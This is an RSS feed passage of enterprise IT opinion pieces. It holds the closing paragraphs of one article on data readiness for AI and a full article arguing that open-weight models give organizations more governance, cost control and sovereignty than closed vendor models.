<p class="wp-block-paragraph">I no longer ask whether an organization is AI-ready. I ask whether its leaders would bet on their own data without a human checking behind the model first. If the honest answer is no, the next investment shouldn’t be another AI platform or a more sophisticated model. It should be a stronger data foundation, built deliberately, with clear ownership, before a single additional AI use case gets greenlit.</p>



<p class="wp-block-paragraph">If another executive asked me for one piece of advice before approving a major AI investment, I’d tell them this: spend one day interrogating your data before spending another dollar on your model. What that conversation reveals will tell you more about your organization’s readiness than any vendor demonstration ever could.</p>



<p class="wp-block-paragraph">Organizations rarely fail because their AI isn’t intelligent enough. They struggle because they ask AI to learn from data that was never prepared to support intelligent decisions in the first place. The organizations that lead in this next era won’t be the ones with the most advanced models. They’ll be the ones that got their own house in order first, and knew it.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[With AI, control matters more than capability]]></title>
<description><![CDATA[Ask most enterprise technology teams where they spend their AI strategy energy and you will get the same answer: figuring out which model to use. It feels like the right question. As organizations move from pilots into production and the real compliance, cost and continuity risks appear, it turns...]]></description>
<link>https://tsecurity.de/de/3697428/it-security-nachrichten/with-ai-control-matters-more-than-capability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3697428/it-security-nachrichten/with-ai-control-matters-more-than-capability/</guid>
<pubDate>Mon, 03 Aug 2026 00:03:34 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Ask most enterprise technology teams where they spend their AI strategy energy and you will get the same answer: figuring out which model to use. It feels like the right question. As organizations move from pilots into production and the real compliance, cost and continuity risks appear, it turns out to be the wrong one.</p>



<p class="wp-block-paragraph">Writing on CIO.com this year, Floyd DCosta <a href="https://www.cio.com/article/4172558/the-next-digital-divide-ai-owners-vs-ai-renters.html">argued the divide is between enterprises that own their AI and those that rent it</a>, and later that <a href="https://www.cio.com/article/4147102/ai-without-sovereignty-is-just-outsourced-intelligence.html">closed-model dependency is outsourced intelligence with a vendor kill switch in your operations</a>. He is right. But the ownership question raises a harder one: own it how? I believe the answer is open-weight and open-source models, not because they are cheaper, but because they are structurally better suited to how serious organizations need to govern and protect AI at scale.</p>



<h2 class="wp-block-heading">Why closed models create governance problems</h2>



<p class="wp-block-paragraph">Building an enterprise AI program on closed, proprietary models from a single external provider is not a technology decision. It is a governance liability. The data confirms the exposure is already real.</p>



<p class="wp-block-paragraph"><a href="https://newsroom.ibm.com/2026-06-17-ibm-study-limited-control-and-rising-dependencies-leave-enterprises-exposed-in-the-age-of-ai">A June 2026 IBM Institute for Business Value study</a> of 1,000 senior executives found that 91% do not fully understand their AI vendor dependencies, 71% said switching providers would be difficult, and 81% said a seven-day vendor outage would cause severe disruption. These figures describe the baseline condition of enterprise AI in 2026.</p>



<p class="wp-block-paragraph">Think about what you give up. You cannot audit the training data. You have no visibility into how the model changes between versions. Your cost structure is set by someone else’s pricing team. And if that provider faces a government directive, a supply disruption or a commercial decision to reprice, you have no leverage and often no warning. For a generic SaaS tool, that is an inconvenience. For organizations in defense, healthcare or financial services, where data handling is regulated by law and audit trails are mandatory, a vendor changing model access terms overnight is a compliance event.</p>



<p class="wp-block-paragraph">The most vivid demonstration came in June 2026, when the U.S. Commerce Department <a href="https://fortune.com/2026/06/13/anthropic-disables-fable-mythos-export-controls-national-security-threat/">ordered Anthropic to suspend access to Fable 5 and Mythos 5 for all foreign nationals</a>, including its own non-citizen employees. The result was a hard global shutoff for every customer, with no advance notice. Enterprises with production workflows on those models were left with nothing. The precedent is now set.</p>



<p class="wp-block-paragraph">This is what AI governance exposure looks like in practice. When your intelligence layer sits entirely outside your control, a single government directive, pricing change or vendor decision can bring your AI operations to a halt. Having seen organizations scramble through exactly this scenario, I can say the ones with no continuity plan are the most exposed. The IBM numbers confirm it: most enterprises have not built the visibility, let alone the architecture, to absorb this kind of disruption. The question is not whether it will happen again. It is whether your architecture is ready when it does.</p>



<h2 class="wp-block-heading">Open-weight models have changed the equation</h2>



<p class="wp-block-paragraph">Until recently, the argument for closed frontier models was simple: they were dramatically better. That gap has narrowed faster than most enterprise technology leaders anticipated, and the conversation has shifted from capability to control.</p>



<p class="wp-block-paragraph">Open-weight models, including Meta’s Llama family, Alibaba’s Qwen series, Zhipu AI’s GLM and DeepSeek, have moved well past the research stage. They are running in production at serious organizations, and not because those organizations could not afford anything better. They chose them because open-weight models give them something closed models cannot: control.</p>



<p class="wp-block-paragraph"><a href="https://www.forbes.com/sites/anishasircar/2026/05/21/airbnb-ceo-brian-chesky-called-chinese-ai-fast-and-cheap-now-congress-wants-answers/">Airbnb’s adoption of Alibaba’s Qwen</a> makes the case plainly. CEO Brian Chesky stated that the company relies heavily on Qwen to power its customer service agent, describing it as “very good” and “fast and cheap,” while noting that OpenAI’s SDK was not ready for the depth of integration Airbnb needed. The agent runs across 13 different models. That is not a cost-cutting move. It is a deliberate multi-model architecture built around control, not just capability.</p>



<p class="wp-block-paragraph"><a href="https://www.axios.com/2026/06/16/microsoft-copilot-cowork-tokenmaxxing-cowork">Microsoft’s evaluation of DeepSeek V4 for Copilot Cowork</a>, reported by Axios in June 2026, tells the same story. The company is exploring a self-hosted DeepSeek to replace the Anthropic and OpenAI models powering its enterprise agentic product, driven by unsustainable costs at scale. Charles Lamanna, Microsoft’s executive vice president for Copilot, agents and platform, told Axios: “We have users who do hundreds of tasks a week… the consequence is the costs can go very high.” The IBM study’s full findings add context: organizations pay 2.8 times more in token processing when AI runs far from the data it depends on.</p>



<p class="wp-block-paragraph">When Airbnb and Microsoft are making these choices in production, the market signal is unambiguous. Open weight is not a fallback. It is the architecture direction serious enterprises are moving toward.</p>



<p class="wp-block-paragraph">Some of these models are Chinese in origin, and yes, that has drawn attention from U.S. lawmakers. Those are real conversations worth having. But here is the practical point: a model running inside your own infrastructure, under your own security controls, gives you more governance than a closed model running on a server you do not own, regardless of where either was built.</p>



<h2 class="wp-block-heading">Three forces accelerating the shift</h2>



<p class="wp-block-paragraph">Three things are pushing enterprises in this direction, and none of them are going away.</p>



<ul class="wp-block-list">
<li><strong>Cost at scale.</strong> Every API call compounds. Open-weight models on your own infrastructure convert that variable cost into one your organization controls. The <a href="https://www.ibm.com/thought-leadership/institute-business-value/en-us/report/ai-sovereignty">IBM study</a> found misaligned AI infrastructure costs enterprises 2.8 times more in token processing. Microsoft’s DeepSeek evaluation is that logic at the largest scale in the industry.</li>



<li><strong>Data protection.</strong> Consider what this means for a hospital routing patient records through a third-party AI API, a defense contractor using a closed model to analyze procurement data, or bank feeding client financials into an external inference endpoint. In each case, compliance is contingent on a vendor relationship the organization does not fully control. HIPAA does not care whether your AI vendor had a good SLA. FedRAMP authorization does not transfer because a model performed well on a benchmark. Regulators expect organizations to demonstrate control over where sensitive data goes, and a closed frontier API is not a defensible answer. The <a href="https://newsroom.ibm.com/2026-06-17-ibm-study-limited-control-and-rising-dependencies-leave-enterprises-exposed-in-the-age-of-ai">IBM study</a> found 68% of executives say meeting data residency and sovereignty requirements across geographies is already challenging. Open-weight models deployed within your own environment remove that exposure entirely. The data does not leave your perimeter, full stop.</li>



<li><strong>Sovereignty.</strong> The Fable 5 episode made clear that your AI capability is only as sovereign as the provider you depend on. For defense primes, intelligence contractors and any organization operating under jurisdiction-specific regulations, this is an existential design question, not a preference. Open-weight models, deployable under your own governance in any environment, are the only architecture that resolves it.</li>
</ul>



<h2 class="wp-block-heading">What this means for enterprise AI architecture</h2>



<p class="wp-block-paragraph">In conversations with technology leaders, the same pattern keeps surfacing: organizations that started with a single frontier provider for speed are now the most constrained when they try to scale, govern or adapt. This is especially acute in regulated sectors. A healthcare organization that built clinical documentation on a closed frontier model faces a hard question every time that vendor changes its data processing terms. A defense contractor with a closed model embedded in its logistics pipeline must revisit its authorization to operate every time the model updates silently. The implication is not to abandon frontier models entirely. It is to stop building AI programs that depend on them as the sole or default layer.</p>



<p class="wp-block-paragraph">The practical answer is a multi-model architecture: frontier models where the capability genuinely justifies the cost and the data exposure, open-weight models running on your own infrastructure for everything else. Not every task needs the most powerful model available. And not every task should leave your perimeter.</p>



<p class="wp-block-paragraph">DCosta framed the coming divide as between AI owners and AI renters. I would take that one step further. The organizations that will genuinely own their AI are the ones building the infrastructure, governance and internal capability to run open-weight models on their own terms, right now. The ones that continue to depend entirely on closed frontier providers are not owners, whatever they call themselves. They are renters, and their leases can be terminated, repriced or restricted at any time. The <a href="https://newsroom.ibm.com/2026-06-17-ibm-study-limited-control-and-rising-dependencies-leave-enterprises-exposed-in-the-age-of-ai">IBM study</a> makes the stakes clear: 57% of executives say replacing a core AI model would require significant decoupling or a full rebuild. The longer you wait to build portability in, the harder it gets.</p>



<p class="wp-block-paragraph">The best AI model is not the one with the highest benchmark score. It is the one that fits into an architecture your organization governs.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 1,45ms -->